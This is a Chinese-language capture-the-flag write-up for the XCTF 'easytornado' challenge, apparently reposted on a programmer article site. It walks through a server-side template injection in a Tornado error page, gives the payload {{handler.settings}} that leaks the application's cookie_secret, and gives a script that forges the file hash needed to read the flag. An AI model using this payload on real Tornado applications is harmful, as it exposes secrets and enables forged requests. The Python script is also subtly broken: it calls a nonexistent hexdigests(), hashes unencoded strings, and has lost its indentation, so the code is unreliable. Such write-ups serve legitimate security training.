攻防世界XCTF:easytornado
程序员文章站
2022-05-15 19:29:49
...
tormado是python中的一个web应用容器
三个txt
flag.txt
welcome.txt
render是python中的一个渲染函数,渲染变量到模板中,即可以通过传递不同的参数形成不同的页面。
Hints.txt
filehash=md5(cookie_secret+md5(filename)) 现在filename=/fllllllllllllag,只需要知道cookie_secret的既能访问flag。
测试后发现还有一个error界面,格式为/error?msg=Error,怀疑存在服务端模板注入攻击 (SSTI)
尝试/error?msg={{datetime}} 在Tornado的前端页面模板中,datetime是指向python中datetime这个模块,Tornado提供了一些对象别名来快速访问对象,可以参考Tornado官方文档
通过查阅文档发现cookie_secret在Application对象settings属性中,还发现self.application.settings有一个别名
handler指向的处理当前这个页面的RequestHandler对象, RequestHandler.settings指向self.application.settings, 因此handler.settings指向RequestHandler.application.settings。
构造payload获取cookie_secret
error?msg={{handler.settings}}
利用这个脚本计算出filehash的值
import hashlib
def md5(s):
md5 = hashlib.md5()
md5.update(s)
return md5.hexdigests()
def filehash():
filename = '/fllllllllllllag'
cookie_secret = '这里填hash'
print(md5(cookie_secret+md5(filename)))
if __name__ == '__main__':
filehash()
payload
file?filename=/fllllllllllllag&filehash=md5(cookie_secret+md5(/fllllllllllllag))
上一篇: 对称加密-DES加密